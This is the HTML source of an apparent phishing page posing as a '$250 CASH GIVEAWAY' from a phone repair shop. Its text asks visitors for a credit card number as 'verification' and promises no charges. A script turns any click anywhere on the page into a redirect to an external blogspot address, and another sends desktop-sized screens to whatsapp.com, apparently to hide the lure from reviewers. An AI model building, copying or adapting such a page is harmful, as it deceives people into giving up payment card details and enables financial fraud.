<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<html lang="en" id="blog" class="no_js">
<meta http-equiv="content-type" content="text/html;charset=UTF-8" />
<meta name="viewport" content="width=device-width, initial-scale=1">
<meta property="fb:app_id" content="124578887583575">
<meta property="og:type" content="website" />
<meta name="robots" content="noindex,nofollow" />
<meta property="og:site_name" content="[ GIVE AWAY TIME ] Irvine Phone Repair" />
<meta property="og:locale" content="en_US" />
<meta itemprop="name" content="[ GIVE AWAY TIME ]  Irvine Phone Repair" />
<meta property="og:title" content="[ GIVE AWAY TIME ]  Irvine Phone Repair" />
<meta property="og:image" content="https://i.postimg.cc/tCVxS8by/IMG-20221110-205958.jpg" />
<meta itemprop="image" content="https://i.postimg.cc/tCVxS8by/IMG-20221110-205958.jpg" />
<link href="https://fonts.googleapis.com/css?family=Nunito+Sans:300i,400,700&display=swap" rel="stylesheet">
<link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/4.7.0/css/font-awesome.min.css">
</head>
<style>
@import url('https://fonts.googleapis.com/css2?family=Open+Sans&display=swap');


* {
    margin: 0;
    padding: 0;
    box-sizing: border-box;
    font-family: 'Open Sans', sans-serif;
}
body{
 background: #f2f2f2;
}
.profile {
  display: flex;
  flex-direction: column;
  align-items: center;
  justify-content: center;
  padding: 20px;
}

.profile>img {
  width: 150px;
  height: 150px;
  border: 3px solid #222;
  border-radius: 100%;
  background: #fff;
}
.profile>p {
  padding: 10px;
  font-size: 1.8em;
  font-weight: 1000;
  letter-spacing: 2px;
  color: #555;
  text-transform: capitalize;
  
}
.txt{
text-align: center;
}
.gambar_atas{
width: 300px;
height: auto;
margin-left: auto;
margin-right: auto;
display: block;
padding: 25px;
}
.cpc{
margin-top:15px;
}
.bok{
width: 100%;
height: auto;
margin-left: auto;
margin-right: auto;
display: block;
background-color: rgba(0,0,0,0.4);
padding:25px;
border-radius: 6px;
box-shadow: 0 .3px 2px rgb(133, 133, 133);
backdrop-filter: blur(8px);
border: 2px solid #555;
}
.txt_atas{
padding: 30px;
color: #f2f2f2;
font-size: 15px;
font-family: "San Francisco Text Regular";
text-align: center;
font-weight: 600;
}
.giva{
background: #555;
width: 300px;
height: auto;
margin-left: auto;
margin-right: auto;
display: block;
padding: 25px;
border-radius: 20px;
border: 1px solid #555;
}
.txt_giv{
   margin-top: 4px;
    width: 100%;
    height: auto;
    padding: 30px;
    color: #f2f2f2;
    font-size: 17px;
    font-family: "San Francisco Text Regular";
    text-align: center;
}
.daftar{
width: 200px;
height: auto;
margin-left: auto;
margin-right: auto;
display: block;
}
.foot{
position: sticky;
top: 0;
left: 0;
bottom: -5px;
width: auto;
padding: 20px 40px;
text-align: center;
font-size: 13px;
background: #fff;
border-top: 1px solid #cccccc;
color:#555;
font-family: "Poppins", sans-serif;
}
</style>
<body onclick="go_click();">
<!--AREA PROFILE-->
<div class="profile">
<img src="https://i.postimg.cc/Y9hsJt8b/jpg1.jpg" alt="give away" />
<p class="txt">Irvine Phone Repair</p>
</div>
<!------------------------------------------------------------>
<div class="spc">
<div class="bok">
<p class="txt_atas"> $250 CASH GIVEAWAY </p>
<div class="spc">
<!--AREA GIF GIVEAWAY-->
<img class="gambar_atas" src="https://i.postimg.cc/Qxsq7X5w/giv.png">
<!------------------------------------------------------------>
<!--AREA JPG GIVEAWAY-->
<img class="giva" src="https://i.postimg.cc/tCVxS8by/IMG-20221110-205958.jpg">
<!------------------------------------------------------------>
<!--AREA TOMBOL-->
<img class="daftar" src="https://i.postimg.cc/zBZh1jF6/1668084249651.png">
<!------------------------------------------------------------>
<div>
</div>
<!--AREA TXT GIVEAWAY-->
<p class="txt_giv"><i>Why do we ask you for your billing information?               
Because we are only licensed to distribute our content to certain countries, 
we ask that you verify your mailing address by providing us with a valid credit card number. <b>We GUARANTEE that NO CHARGES</b> will be applied for validating your account. No charges will appear on your credit card statement unless you upgrade to a Premium Membership or make a purchase.                             
Registration is free of charge, credit card is only a <b>VERIFICATION</b> the terms of the winner, thank you !!!</i></p>
<!------------------------------------------------------------>
<div>
</div>
</div>
</div>
</div>
</div>
<div class="foot">
<span>
<br>Privacy and Security Policy<br>
     Copyright &copy; 2022 | <u><b>Irvine Phone Repair.</u></span>
</b>
</span>
    </div>
    <div>
	
	<script>
    function go_click() {
      window.location.href = "https://suclt.blogspot.com/?m=0";
      window.onbeforeunload = null;
      window.location.href = fin_link;
    }
  </script>
  <script type="text/javascript">
if (screen.width > 900) { window.location = "https://whatsapp.com"; }
</script>
</body>
</html>